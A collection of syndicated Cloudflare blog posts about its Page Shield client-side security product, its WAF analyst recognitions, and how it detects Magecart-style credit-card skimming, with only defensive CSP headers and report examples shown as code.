If you manage a website, and you have ever wondered where end user data might be going and who has access to it, starting today, you can find out using Page Shield’s Connection Monitor.

Page Shield is our client side security solution that aims to detect malicious behavior and compromises that affect the browser environment directly, such as those that exploit vulnerabilities in third party JavaScript libraries.

Connection Monitor, available from today, is the latest addition to Page Shield and allows you to see outbound connections being made by your users’ browsers initiated by third party JavaScript added to your site. You can then review this information to ensure only appropriate third parties are receiving sensitive data.

Customers on our business and enterprise plans receive visibility in outbound connections provided by Connection Monitor. If you are using our Page Shield enterprise add-on, you also get notifications whenever a connection is found to be potentially malicious.

Covering more attack surface with Connection Monitor

Connection Monitor expands the net of opportunities to catch malicious behavior that might be happening in your users’ browsers by complementing the visibility provided by Script Monitor, the core feature of Page Shield before today.

While Script Monitor is focusing on analyzing JavaScript code to find malicious signals, Connection Monitor is looking at where data is sent to. The two features work perfectly together.

Very frequently, in fact, client side compromises within the context of web applications result in data exfiltration. The most well known example of this is Magecart-style attacks where a malicious actor would attempt to exfiltrate credit card data directly from the application’s check out flow (normally on e-commerce sites) without changing the application behavior.

These attacks are often hard to detect as they exploit JavaScript outside your direct control, for example an embedded widget, and operate without any noticeable effect on the user experience.

Page Shield can now watch for malicious outbound connections made by third-party JavaScript code

Complementing Content Security Policies

Page Shield uses Content Security Policies (CSPs) to receive data from the browser, but complements them by focusing on the core problem: detecting malicious behavior, something that CSPs don’t do out of the box.

Content Security Policies are widely adopted and allow you, as a website administrator, to tell browsers what the browser is allowed to load and from where. This is useful in principle, but in practice CSPs are hard to maintain for large applications, and often end up being very broad making them ineffective. More importantly, CSPs provide no built-in mechanism to detect malicious behavior. This is where Page Shield helps.

Before today, with Script Monitor, Page Shield would detect malicious behavior by focusing on JavaScript files only, by running, among other things, our classifier on JavaScript code. Starting today, with Connection Monitor, we also perform threat intelligence feed lookups against connection URL endpoints allowing us to quickly spot potentially suspicious data leaks.

Connection Monitor: under the hood

Connection Monitor uses the connect-src directive from Content Security Policies (CSPs) to receive information about outbound connections from browsers.

This information is then stored for easy access and enhanced with additional insights including connection status, connection page source, domain information, and if you have access to our enterprise add-on, threat feed intelligence.

To use Connection Monitor you need to proxy your application via Cloudflare. When turned on, it will, on a sampled percentage of HTML page loads only, insert the following HTTP response header that implements the Content Security Policy used to receive data:

content-security-policy-report-only: script-src 'none'; connect-src 'none'; report-uri <HOSTNAME>/cdn-cgi/script_monitor/report?<QUERY_STRING>

This HTTP response header asks the browser to send information regarding scripts (script-src) and connections (connect-src) to the given endpoint. By default, the endpoint hostname is csp-reporting.cloudflare.com, but you can change it to be the same hostname of your website if you are on our enterprise add-on.

Using the above CSP, browsers will report any connections initiated by:

  • <a> ping,
  • fetch(),
  • XMLHttpRequest,
  • WebSocket,
  • EventSource, and
  • Navigator.sendBeacon()

An example connection report is shown below:

"csp-report": {
    "document-uri": "https://cloudflare.com/",
    "referrer": "",
    "violated-directive": "connect-src",
    "effective-directive": "connect-src",
    "original-policy": "",
    "disposition": "report",
    "blocked-uri": "wss://example.com/",
    "line-number": 5,
    "column-number": 16,
    "source-file": "",
    "status-code": 200,
    "script-sample": ""

Using reports like the one above, we can then create an inventory of outbound connection URLs alongside which pages they were initiated by. This data is then made available via the dashboard enhanced with:

  • Connection status: Active if the connection has been seen recently
  • Timestamps: First seen and last seen
  • Metadata: WHOIS information, SSL certificate information, if any, domain registration information
  • Malicious signals: Threat feed domain and URL lookups*

* URL feed lookups are only available if the full connection path is being stored.

A note on privacy

At Cloudflare, we want to ensure both direct customer and end customer privacy. For this reason, Connection Monitor by default will only store and collect the scheme and host portion of the connection URL, so for example, if the endpoint the browser is sending data to is:


Connection Monitor will only store https://connection.example.com and drop the path /session/abc. This ensures that we are minimizing the risk of storing session IDs, or other sensitive data that may be found in full URLs.

Not storing the path, does mean that in some specific circumstances, we are not able to do full URL feed lookups from our threat intelligence. For this reason, if you know you are not inserting sensitive data in connection paths, you can easily turn on path storage from the dashboard. Domain lookups will continue to work as expected. Support for also storing the query string will be added in the future.

Going further

Script Monitor and Connection Monitor are only two of many directives provided by CSP that we plan to support in Page Shield. Going further, there are a number of additional features we are already working on, including the ability to suggest and implement both positive and negative policies directly from the dashboard.

We are excited to see Connection Monitor providing additional visibility in application behavior and look forward to the next evolutions.

Cloudflare named a Leader in WAF by Forrester

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/cloudflare-named-leader-waf-forrester-2022/

Cloudflare named a Leader in WAF by Forrester

Cloudflare named a Leader in WAF by Forrester

Forester has recognised Cloudflare as a Leader in The Forrester Wave™: Web Application Firewalls, Q3 2022 report. The report evaluated 12 Web Application Firewall (WAF) providers on 24 criteria across current offering, strategy and market presence.

You can register for a complimentary copy of the report here. The report helps security and risk professionals select the correct offering for their needs.

We believe this achievement, along with recent WAF developments, reinforces our commitment and continued investment in the Cloudflare Web Application Firewall (WAF), one of our core product offerings.

The WAF, along with our DDoS Mitigation and CDN services, has in fact been an offering since Cloudflare’s founding, and we could not think of a better time to receive this recognition: Birthday Week.

We’d also like to take this opportunity to thank Forrester.

Leading WAF in strategy

Cloudflare received the highest score of all assessed vendors in the strategy category. We also received the highest possible scores in 10 criteria, including:

  • Innovation
  • Management UI
  • Rule creation and modification
  • Log4Shell response
  • Incident investigation
  • Security operations feedback loops

According to Forrester, “Cloudflare Web Application Firewall shines in configuration and rule creation”, “Cloudflare stands out for its active online user community and its associated response time metrics”, and “Cloudflare is a top choice for those prioritizing usability and looking for a unified application security platform.”

Protecting web applications

The core value of any WAF is to keep web applications safe from external attacks by stopping any compromise attempt. Compromises can in fact lead to complete application take over and data exfiltration resulting in financial and reputational damage to the targeted organization.

The Log4Shell criterion in the Forrester Wave report is an excellent example of a real world use case to demonstrate this value.

Log4Shell was a high severity vulnerability discovered in December 2021 that affected the popular Apache Log4J software commonly used by applications to implement logging functionality. The vulnerability, when exploited, allows an attacker to perform remote code execution and consequently take over the target application.

Due to the popularity of this software component, many organizations worldwide were potentially at risk after the immediate public announcement of the vulnerability on December 9, 2021.

We believe that we scored the highest possible score in the Log4Shell criterion due to our fast response to the announcement, by ensuring that all customers using the Cloudflare WAF were protected against the exploit in less than 17 hours globally.

We did this by deploying new managed rules (virtual patching) that were made available to all customers. The rules were deployed with a block action ensuring exploit attempts never reached customer applications.

Additionally, our continuous public updates on the subject, including regarding internal processes, helped create clarity and understanding around the severity of the issue and remediation steps.

In the following weeks from the initial announcement, we updated WAF rules several times following discovery of multiple variations of the attack payloads.

The Cloudflare WAF ultimately “bought” valuable time for our customers to patch their back end systems before attackers may have been able to find and attempt compromise of vulnerable applications.

You can read about our response and our actions following the Log4Shell announcement in great detail on our blog.

Use the Cloudflare WAF today

Cloudflare WAF keeps organizations safer while they focus on improving their applications and APIs. We integrate leading application security capabilities into a single console to protect applications with our WAF while also securing APIs, stopping DDoS attacks, blocking unwanted bots, and monitoring for 3rd party JavaScript attacks.

To start using our Cloudflare WAF today, sign up for an account.

Cloudflare named a Leader by Gartner

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/cloudflare-waap-named-leader-gartner-magic-quadrant-2022/

Cloudflare named a Leader by Gartner

Cloudflare named a Leader by Gartner

Gartner has recognised Cloudflare as a Leader in the 2022 “Gartner® Magic Quadrant™ for Web Application and API Protection (WAAP)” report that evaluated 11 vendors for their ‘ability to execute’ and ‘completeness of vision’.

You can register for a complimentary copy of the report here.

We believe this achievement highlights our continued commitment and investment in this space as we aim to provide better and more effective security solutions to our users and customers.

Keeping up with application security

With over 36 million HTTP requests per second being processed by the Cloudflare global network we get unprecedented visibility into network patterns and attack vectors. This scale allows us to effectively differentiate clean traffic from malicious, resulting in about 1 in every 10 HTTP requests proxied by Cloudflare being mitigated at the edge by our WAAP portfolio.

Visibility is not enough, and as new use cases and patterns emerge, we invest in research and new product development. For example, API traffic is increasing (55%+ of total traffic) and we don’t expect this trend to slow down. To help customers with these new workloads, our API Gateway builds upon our WAF to provide better visibility and mitigations for well-structured API traffic for which we’ve observed different attack profiles compared to standard web based applications.

We believe our continued investment in application security has helped us gain our position in this space, and we’d like to thank Gartner for the recognition.

Cloudflare WAAP

At Cloudflare, we have built several features that fall under the Web Application and API Protection (WAAP) umbrella.

DDoS protection & mitigation

Our network, which spans more than 275 cities in over 100 countries is the backbone of our platform, and is a core component that allows us to mitigate DDoS attacks of any size.

To help with this, our network is intentionally anycasted and advertises the same IP addresses from all locations, allowing us to “split” incoming traffic into manageable chunks that each location can handle with ease, and this is especially important when mitigating large volumetric Distributed Denial of Service (DDoS) attacks.

The system is designed to require little to no configuration while also being “always-on” ensuring attacks are mitigated instantly. Add to that some very smart software such as our new location aware mitigation, and DDoS attacks become a solved problem.

For customers with very specific traffic patterns, full configurability of our DDoS Managed Rules is just a click away.

Web Application Firewall

Our WAF is a core component of our application security and ensures hackers and vulnerability scanners have a hard time trying to find potential vulnerabilities in web applications.

This is very important when zero-day vulnerabilities become publicly available as we’ve seen bad actors attempt to leverage new vectors within hours of them becoming public. Log4J, and even more recently the Confluence CVE, are just two examples where we observed this behavior. That’s why our WAF is also backed by a team of security experts who constantly monitor and develop/improve signatures to ensure we “buy” precious time for our customers to harden and patch their backend systems when necessary. Additionally, and complementary to signatures, our WAF machine learning system classifies each request providing a much wider view in traffic patterns.

Our WAF comes packed with many advanced features such as leaked credential checks, advanced analytics and alerting and payload logging.

Bot Management

It is no secret that a large portion of web traffic is automated, and while not all automation is bad, some is unnecessary and may also be malicious.

Our Bot Management product works in parallel to our WAF and scores every request with the likelihood of it being generated by a bot, allowing you to easily filter unwanted traffic by deploying a WAF Custom Rule, all this backed by powerful analytics. We make this easy by also maintaining a list of verified bots that can be used to further improve a security policy.

In the event you want to block automated traffic, Cloudflare’s managed challenge ensures that only bots receive a hard time without impacting the experience of real users.

API Gateway

API traffic, by definition, is very well-structured relative to standard web pages consumed by browsers. At the same time, APIs tend to be closer abstractions to back end databases and services, resulting in increased attention from malicious actors and often go unnoticed even to internal security teams (shadow APIs).

API Gateway, that can be layered on top of our WAF, helps you both discover API endpoints served by your infrastructure, as well detect potential anomalies in traffic flows that may indicate compromise, both from a volumetric and sequential perspective.

The nature of APIs also allows API Gateway to much more easily provide a positive security model contrary to our WAF: only allow known good traffic and block everything else. Customers can leverage schema protection and mutual TLS authentication (mTLS) to achieve this with ease.

Page Shield

Attacks that leverage the browser environment directly can go unnoticed for some time, as they don’t necessarily require the back end application to be compromised. For example, if any third party JavaScript library used by a web application is performing malicious behavior, application administrators and users may be none the wiser while credit card details are being leaked to a third party endpoint controlled by an attacker. This is a common vector for Magecart, one of many client side security attacks.

Page Shield is solving client side security by providing active monitoring of third party libraries and alerting application owners whenever a third party asset shows malicious activity. It leverages both public standards such as content security policies (CSP) along with custom classifiers to ensure coverage.

Page Shield, just like our other WAAP products, is fully integrated on the Cloudflare platform and requires one single click to turn on.

Security Center

Cloudflare’s new Security Center is the home of the WAAP portfolio. A single place for security professionals to get a broad view across both network and infrastructure assets protected by Cloudflare.

Moving forward we plan for the Security Center to be the starting point for forensics and analysis, allowing you to also leverage Cloudflare threat intelligence when investigating incidents.

The Cloudflare advantage

Our WAAP portfolio is delivered from a single horizontal platform, allowing you to leverage all security features without additional deployments. Additionally, scaling, maintenance and updates are fully managed by Cloudflare allowing you to focus on delivering business value on your application.

This applies even beyond WAAP, as, although we started building products and services for web applications, our position in the network allows us to protect anything connected to the Internet, including teams, offices and internal facing applications. All from the same single platform. Our Zero Trust portfolio is now an integral part of our business and WAAP customers can start leveraging our secure access service edge (SASE) with just a few clicks.

If you are looking to consolidate your security posture, both from a management and budget perspective, application services teams can use the same platform that internal IT services teams use, to protect staff and internal networks.

Continuous innovation

We did not build our WAAP portfolio overnight, and over just the past year we’ve released more than five major WAAP portfolio security product releases. To showcase our speed of innovation, here is a selection of our top picks:

  • API Shield Schema Protection: traditional signature based WAF approaches (negative security model) don’t always work well with well-structured data such as API traffic. Given the fast growth in API traffic across the network we built a new incremental product that allows you to enforce API schemas directly at the edge using a positive security model: only let well-formed data through to your origin web servers;
  • API Abuse Detection: complementary to API Schema Protection, API Abuse Detection warns you whenever anomalies are detected on your API endpoints. These can be triggered by unusual traffic flows or patterns that don’t follow normal traffic activity;
  • Our new Web Application Firewall: built on top of our new Edge Rules Engine, the core Web Application Firewall received a complete overhaul, all the way from engine internals to the UI. Better performance both in terms of latency and efficacy at blocking malicious payloads, along with brand-new capabilities including but not limited to Exposed Credential Checks, account wide configurations and payload logging;
  • DDoS customizable Managed Rules: to provide additional configuration flexibility, we started exposing some of our internal DDoS mitigation managed rules for custom configurations to further reduce false positives and allow customers to increase thresholds / detections as required;
  • Security Center: Cloudflare view on infrastructure and network assets, along with alerts and notifications for miss configurations and potential security issues;
  • Page Shield: based on growing customer demand and the rise of attack vectors focusing on the end user browser environment, Page Shield helps you detect whenever malicious JavaScript may have made its way into your application’s code;
  • API Gateway: full API management, including routing directly from the Cloudflare edge, with API Security baked in, including encryption and mutual TLS authentication (mTLS);
  • Machine Learning WAF: complementary to our WAF Managed Rulesets, our new ML WAF engine, scores every single request from 1 (clean) to 99 (malicious) giving you additional visibility in both valid and non-valid malicious payloads increasing our ability to detect targeted attacks and scans towards your application;

Looking forward

Our roadmap is packed with both new application security features and improvements to existing systems. As we learn more about the Internet we find ourselves better equipped to keep your applications safe. Stay tuned for more.

Gartner, “Magic Quadrant for Web Application and API Protection”, Analyst(s): Jeremy D’Hoinne, Rajpreet Kaur, John Watts, Adam Hils, August 30, 2022.

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
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Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Making Page Shield malicious code alerts more actionable

Post Syndicated from Simon Wijckmans original https://blog.cloudflare.com/making-page-shield-malicious-code-alerts-more-actionable/

Making Page Shield malicious code alerts more actionable

Making Page Shield malicious code alerts more actionable

Last year during CIO week, we announced Page Shield in general availability. Today, we talk about improvements we’ve made to help Page Shield users focus on the highest impact scripts and get more value out of the product. In this post we go over improvements to script status, metadata and categorization.

What is Page Shield?

Page Shield protects website owners and visitors against malicious 3rd party JavaScript. JavaScript can be leveraged in a number of malicious ways: browser-side crypto mining, data exfiltration and malware injection to mention a few.

For example a single hijacked JavaScript can expose millions of user’s credit card details across a range of websites to a malicious actor. The bad actor would scrape details by leveraging a compromised JavaScript library, skimming inputs to a form and exfiltrating this to a 3rd party endpoint under their control.

Today Page Shield partially relies on Content Security Policies (CSP), a browser native framework that can be used to control and gain visibility of which scripts are allowed to load on pages (while also reporting on any violations). We use these violation reports to provide detailed information in the Cloudflare dashboard regarding scripts being loaded by end-user browsers.

Page Shield users, via the dashboard, can see which scripts are active on their website and on which pages. Users can be alerted in case a script performs malicious activity, and monitor code changes of the script.

Script status

To help identify malicious scripts, and make it easier to take action on live threats, we have introduced a status field.

When going to the Page Shield dashboard, the customer will now only see scripts with a status of active. Active scripts are those that were seen in the last seven days and didn’t get served through the “cdn-cgi” endpoint (which is managed by Cloudflare).

We also introduced other statuses:

  • infrequent scripts are scripts that have only been seen in a negligible amount of CSP reports over a period of time. TThey normally indicate a single user’s browser using a compromised browser extension. The goal of this status is to reduce noise caused by browser plugins that inject their JavaScript in the HTML.
  • inactive scripts are those that have not been reported for seven days and therefore have likely since been removed or replaced.
  • cdn-cgi are scripts served from the ‘/cdn-cgi/’ endpoint which is managed by Cloudflare. These scripts are related to Cloudflare products like our analytics or Bot Management features. Cloudflare closely monitors these scripts, they are fairly static, so they shouldn’t require close monitoring by a customer and therefore are hidden by default unless our detections find anything suspicious.

If the customer wishes to see the full list of scripts including the non-active scripts they can still do so by clicking ‘All scripts’.

Making Page Shield malicious code alerts more actionable

Script metadata in alerts

Customers that opt into the enterprise add-on version of Page Shield can also choose to set up notifications for malicious scripts. In the previous version, we offered the script URL, first seen on and last seen on data. These alerts have been revamped to improve the experience for security analysts. Our goal is to provide all data a security analyst would manually look-up in order to validate a script. With this update we’ve made a significant step in that direction through using insights delivered by Cloudflare Radar.

At the top of the email alert you will now find where the script was seen along with other information regarding when the script was seen and the full URL (not clickable for security purposes).

As part of the enterprise add-on version of Page Shield we review the scripts through a custom machine learning classifier and a range of domain and URL threat feeds. A very common question with any machine learning scoring system is “why did it score the way it scored”. Because of this, the machine learning score generated by our system has now been split up to show the components that made up the score; currently: obfuscation and data exfiltration values. This should help to improve the ability for a customer to review a script in case of a false positive.

Threat feeds can be very helpful in detecting new attack styles that our classifier hasn’t been trained for yet. Some of these feeds offer us a range of categories of malicious endpoints such as ‘malware’, ‘spyware’ or ‘phishing’. Our enterprise add-on customers will now be able to see the categorization in our alerts (as shown above) and on the dashboard. The goal is to provide more context on why a script is considered malicious.

We also now provide information on script changes along with the “malicious code score” for each version.

Making Page Shield malicious code alerts more actionable

Right below the most essential information we have added WHOIS information on the party domain that is providing the script. In some cases the registrar may hide relevant information such as the organization’s name, however, information on the date of registration and expiration can be very useful in detecting unexpected changes in ownership. For example, we often see malicious scripts being hosted under newly registered domains.

Making Page Shield malicious code alerts more actionable

We also now offer details regarding the SSL certificates issued for this domain through certificate transparency monitoring. This can be useful in detecting a potential take over. For example, if a 3rd party script endpoint usually uses a Digicert certificate, but recently a Let’s Encrypt certificate has been issued this could be an indicator that another party is trying to take over the domain.

Making Page Shield malicious code alerts more actionable

Last but not least, we have improved our dashboard link to take users directly to the specific script details page provided by the Page Shield UI.

What’s next?

There are many ways to perform malicious activity through JavaScript. Because of this it is important that we build attack type specific detection mechanisms as well as overarching tools that will help detect anomalies. We are currently building a new component purpose built to look for signs of malicious intent in data endpoints by leveraging the connect-src CSP directive. The goal is to improve the accuracy of our Magecart-style attack detection.

We are also working on providing the ability to generate CSP policies directly through Page Shield making it easy to perform positive blocking and maintain rules over time.

Another feature we are working on is offering the ability to block scripts from accessing a user’s webcam, microphone or location through a single click.

More about this in future blog posts. Many more features to come!

Detecting Magecart-Style Attacks With Page Shield

Post Syndicated from Oliver Cookman original https://blog.cloudflare.com/detecting-magecart-style-attacks-for-pageshield/

Detecting Magecart-Style Attacks With Page Shield

Detecting Magecart-Style Attacks With Page Shield

During CIO week we announced the general availability of our client-side security product, Page Shield. Page Shield protects websites’ end users from client-side attacks that target vulnerable JavaScript dependencies in order to run malicious code in the victim’s browser. One of the biggest client-side threats is the exfiltration of sensitive user data to an attacker-controlled domain (known as a Magecart-style attack). This kind of attack has impacted large organizations like British Airways and Ticketmaster, resulting in substantial GDPR fines in both cases. Today we are sharing details of how we detect these types of attacks and how we’re going to be developing the product into the future.

How does a Magecart-style attack work?

Magecart-style attacks are generally quite simple, involving just two stages. First, an attacker finds a way to compromise one of the JavaScript files running on the victim’s website. The attacker then inserts malicious code which reads personally identifiable information (PII) being entered by the site’s users, and exfiltrates it to an attacker-controlled domain. This is illustrated in the diagram below.

Detecting Magecart-Style Attacks With Page Shield

Magecart-style attacks are of particular concern to online retailers with users entering credit card details on the checkout page. Forms for online banking are also high-value targets along with login pages and anywhere else where you enter personal details online.

Attackers have a number of routes through which they can compromise a popular library and get their malicious code running on an unknowing vendor’s website, which include:

  • Compromising third-party providers
  • Compromising the website itself
  • Exploiting vulnerabilities

Frequently, the third-party providers themselves get compromised and attackers gain the ability to modify code that’s being distributed to a number of websites; this was the case with the Ibenta breach that compromised Ticketmaster. Alternatively, if attackers gain admin access to the site itself, they can modify one of the scripts being used and insert their malicious code — which happened in 2018 to British Airways. Libraries that have reached their end of life and are no longer maintained by their creators are vulnerable to zero-day exploits. Automated attacks have been seen compromising thousands of checkout pages in one go by taking advantage of this.

What can be done about it?

Application security providers and security teams are able to provide several defense mechanisms for site owners that include:

Detecting Magecart-Style Attacks With Page Shield

Content Security Policies: Page Shield uses a content security policy (CSP) deployed with a report-only directive to collect information from the browser about the scripts running on an application. That allows us to provide basic visibility to application owners about the files that are running on their site.

Static Analysis: Downloading the script and performing automated analysis on the content using machine learning techniques or databases of handwritten signatures can identify malicious scripts that would otherwise go undetected.

Threat Feeds: Databases of malicious hostnames or URLs are effective at capturing malware we already know about and complement detection capabilities that are targeted at novel attacks.

Subresource Integrity Checks: Application owners can include a cryptographic hash of the files they are loading in the ‘integrity’ attribute of any script or link. This is effective at protecting against unexpected changes at the source by malicious third parties.

External Connection Checks: Extracting a list of external connections being made by each script and comparing these against blocklists and allowlists can help spot malicious exfiltration attempts to attacker-controlled domains.

Page Shield currently leverages CSP reports, threat-intelligence feeds, and ML-based static analysis in order to detect malicious scripts. We think static analysis has an important role to play in the detection of client-side threats with the ability to detect attacks that are unlikely to be found with the other mechanisms.

Some ways we’re doing static analysis

Our static analysis system covers two scenarios:

  1. The code is readable, and its functionality has not been obscured
  2. The functionality of the code has been obscured (with or without malicious intent)

This gives four categories of script to analyze:

  1. Benign scripts
  2. Malicious scripts
  3. Obfuscated or minified benign scripts
  4. Obfuscated malicious scripts

We’ve developed separate models for the two scenarios mentioned above. The first is targeted at detecting ‘clean’ scripts, where the code has not been obscured. The second looks at obfuscated scripts and differentiates between malicious and benign content.

The detection of ‘clean’ malicious scripts relies on an analysis of the script’s data flow properties which are derived from a representation of the script called an abstract syntax tree. Consider the following very simple example script:

Detecting Magecart-Style Attacks With Page Shield

This script has an associated abstract syntax tree (AST), a graph-based representation of the structure of the program, and a key tool in static analysis of malware. The below diagram shows a sample of the AST from the above code snippet.

Detecting Magecart-Style Attacks With Page Shield

Page Shield uses a script’s AST to detect whether a significant change has occurred in the structure of the program (triggering a change alert), and also to derive the script’s corresponding data flow graph, which tracks the flow of data between variable assignments and function calls. The figure below shows the raw data flow graph derived from the AST for our simple example.

Detecting Magecart-Style Attacks With Page Shield

We have developed an ML model capable of identifying nodes on the graph that relate to PII reads or malicious data exfiltration which produces the likelihoods on the graph shown below. The nodes in blue have been classified as related to PII and those in red as being related to data exfiltration:

Detecting Magecart-Style Attacks With Page Shield

A script can be classified as malicious if there’s a connected path on the graph between nodes involved in the reading of PII and nodes that form part of the data exfiltration call to an attacker-controlled domain:

Detecting Magecart-Style Attacks With Page Shield

Models agnostic to the connection between the PII-read and exfiltration call are prone to false positives in scenarios where they are unrelated. Our data-flow based approach allows us to effectively detect attacks while eliminating false positives from disconnected logic.

Malicious actors, however, are usually trying to evade detection, and in order to avoid being spotted will often conceal their attack by encoding and transforming the content beyond recognition. Our second model handles this type of content and is able to differentiate between benign and malicious use of obfuscation.

The below example shows an attack that’s been obscured via the inclusion of hex-encoded strings in a list _0xb902 which is subsequently referenced.

Detecting Magecart-Style Attacks With Page Shield

Normalizing the content by decoding hex digits on hex-matching substrings reveals a number of JavaScript keywords used as part of the attack.

Detecting Magecart-Style Attacks With Page Shield

The concept of ‘revealed-risk’ — how risky the revealed content is, forms the core of our approach for differentiating between obfuscated malware and legitimate uses of character encoding or minification. For example, revealing keywords like “cc_number” and “stringify” in the above example provides a strong signal that this is an attack.

However, analyzing the revealed risk only works if you can normalize the content. Frequently attackers go far beyond simple character encoding schemes to hide their malicious code. It is common to see custom-defined obfuscation functions in malicious scripts that can apply any arbitrary series of transformations to the input string. For example, consider a potential encoding function:

Detecting Magecart-Style Attacks With Page Shield

This transforms the string document.getElementById

to 646u63756s656t742t676574456r656s656t7442794964.

The decoding function defined in the script would be:

Detecting Magecart-Style Attacks With Page Shield

Normalizing strings that have been through complex transformations requires execution of the code, and so in order to avoid a trivial bypass with an encoding scheme such as the above, our model also detects the presence of malicious, encoded strings that cannot be normalized.

With our approach of analyzing clean and obfuscated content separately, looking for connected paths on the data flow graph, revealed risk or arbitrary string transformations, we’ve been able to detect most attacks that we’ve seen to date. We’re excited to see what we find as we onboard more customers onto Page Shield and will continue to evolve our detection capabilities over time.

What’s next?

We’re constantly improving on our models and will be expanding content-based risk-scoring to include other attack types like crypto-mining and adware over the coming months. Enterprise customers can sign up for Page Shield’s enterprise add-on which includes content-based detection of Magecart-style attacks within your sites’ JavaScript dependencies.

Sign up for Page Shield today to protect your customers’ data.

Page Shield is generally available

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/page-shield-generally-available/

Page Shield is generally available

Page Shield is generally available

Supply chain attacks are a growing concern for CIOs and security professionals.

During a supply chain attack, an attacker compromises a third party tool or library that is being used by the target application. This normally results in the attacker gaining privileged access to the application’s environment allowing them to steal private data or perform subsequent attacks. For example, Magecart, is a very common type of supply chain attack, whereby the attacker skimms credit card data from e-commerce site checkout forms by compromising third party libraries used by the site.

To help identify and mitigate supply chain attacks in the context of web applications, today we are launching Page Shield in General Availability (GA).

With Page Shield you gain visibility on what scripts are running on your application and can be notified when they have been compromised or are showing malicious behaviour such as attempting to exfiltrate user data.

We’ve worked hard to make Page Shield easy to use: you can find it under the Firewall tab and turn it on with one simple click. No additional configuration required. Alerts can be set up separately on an array of different events.

Page Shield is generally available

What is Page Shield?

Back in March of this year, we announced early access to Page Shield, our solution to protect end user data from exploits targeting the browser.

Earlier today, we announced our acquisition of Zaraz, a tool built on Workers that allows customers to easily load third-party tools on the cloud, instead of loading their JavaScript code in the browser, directly from the Cloudflare UI with immediate performance and security benefits. But not all applications use, or wish to use, a third-party manager. Nonetheless, we have got you covered.

Page Shield leverages our position in the network as a reverse proxy to receive information directly from the browser about what JavaScript files and modules are being loaded. We then provide visibility, analyse, and warn you whenever a JavaScript file is showing malicious behaviour.

Examples of compromised JavaScript files include Magecart attacks, cryptomining, and adware. With the ever-growing popularity of SaaS-based applications and services, it is very rare to find an application that does not leverage or load JavaScript code directly from third parties out of the application owner’s control, making detecting and mitigating compromised files even harder.

How hard is client-side security?

Early indications from Page Shield indicate that, on average, any given application is loading scripts from eight third-party hosts. These hosts could be owned by large enterprises such as Google, to smaller companies that provide “plug and play” modules that quickly enhance web application functionality (think chat systems, date pickers, checkout platforms etc.). Each one of these third parties can be a target for a potential supply chain attack, making the attack surface very large and difficult to monitor.

To make matters worse, things change fast. On average about 50% of applications are loading scripts from new third party hosts every month. This indicates that the attack surface is not only large, but also changing rapidly.

How does Page Shield work?

As with any security product, we can think of Page Shield as providing visibility, detection, mitigation, and prevention. The first step is visibility.


When turned on, the current iteration of Page Shield uses a content security policy (CSP) deployed with a report-only directive to collect information from the browser. This allows us to provide you with a list of all scripts running on your application.

In HTTP terms, this is an HTTP response header added to a sample of page responses from the origin server back to the browser. The CSP header looks like this:

content-security-policy-report-only: script-src 'none'; report-uri /cdn-cgi/script_monitor/report

The above header instructs the browser that no scripts should be loaded  (script-src 'none') and to report any violation to the endpoint provided (report-uri /cdn-cgi/script_monitor/report). Also note that the violation report endpoint resolves to the Cloudflare network where it is processed, so no additional traffic reaches the origin server.

Each violation report sent by the browser, implemented as an HTTP POST request, provides us with information on the script. Here is an example:

      "original-policy":"script-src 'none'; report-uri /cdn-cgi/script_monitor/report",

This report tells us:

  • The page the script was loaded from (document-uri)
  • The referrer, if applicable
  • Which CSP directive was violated
  • The full CSP that contains the directive
  • The full link to the JavaScript file
  • The response code the browser received when loading the file. In the example above, the response code is 200, which indicates that the file was loaded successfully.

By collating all the information provided in the reports and enhancing it with additional data, we are able to provide detailed information on every script being loaded by your application, both via the Cloudflare UI and API.

All Cloudflare Pro zones have access to our Page Shield script reports. Additionally, Business and Enterprise zones have access to page attribution information, allowing you to quickly identify where a script is being loaded from within your application. Business and Enterprise zones can also set up alerts on a number of script change events.


Application owners might be leveraging content security policies already to ensure only specific scripts are loaded. However, CSPs often tend to be too liberal, and browsers provide no native mechanisms to detect when JavaScript files show malicious behaviour. This includes JavaScript code that is allowed to be loaded according to a content security policy, highly reducing their effectiveness.

With Page Shield we believe to have a real opportunity to help our customers with malicious behaviour detection.

For any JavaScript file found in your zone by the system, we will perform a number of actions aimed at detecting malicious behaviour:

  1. Any JavaScript file loaded from a hostname categorised as malicious in our threat feeds will be flagged appropriately. This includes parent domains.
  2. Similarly, if specific URLs are categorised as malicious in our feeds, these will also be flagged. In this latter case, given the exact file has been categorized as malicious, an attack is likely ongoing.
  3. Finally, we will download the file and run it through our classifier. The classifier performs deobfuscation, normalisation and decoding steps before looking for correlations between form field fetches and data exfiltration calls. The stronger the correlation the more likely the script is performing a Magecart type attack. We will post additional technical details about our technology in follow-up posts — stay tuned!

Our Enterprise customers can purchase the full set of Page Shield capabilities, including the detection capabilities. Please contact your account manager.

As we build the product further through next year, we plan to add additional detection signals as well as improve upon our classifier and detect additional attack types, including adware, ransomware and crypto mining.

Once a malicious signal triggers on a JavaScript file, Cloudflare is able to notify you via an alert that can be set up via email, webhook, PagerDuty, and other formats.

Prevention and mitigation

Many of our larger customers have content security policies already, and although it is easy to add an HTTP response header that implements a CSP via Cloudflare, we can do better.

Although not included in this immediate release, we are already hard at work to bring both prevention and mitigation options to Page Shield:

  • Prevention by allowing easy CSP generation based on observed active scripts, allowing for editing and redeploying of policies as required either via the dashboard or directly via API as part of a deployment pipeline.
  • Blocking by leveraging our proxy to allow for malicious scripts to be removed inline from HTTP response bodies.

Get started

If you already have a website on Cloudflare, upgrade to any of our paid plans to start leveraging Page Shield features today without any additional configuration required. You can also use our API to leverage Page Shield features.

If you do not have a website on Cloudflare, signing up only takes 5 minutes!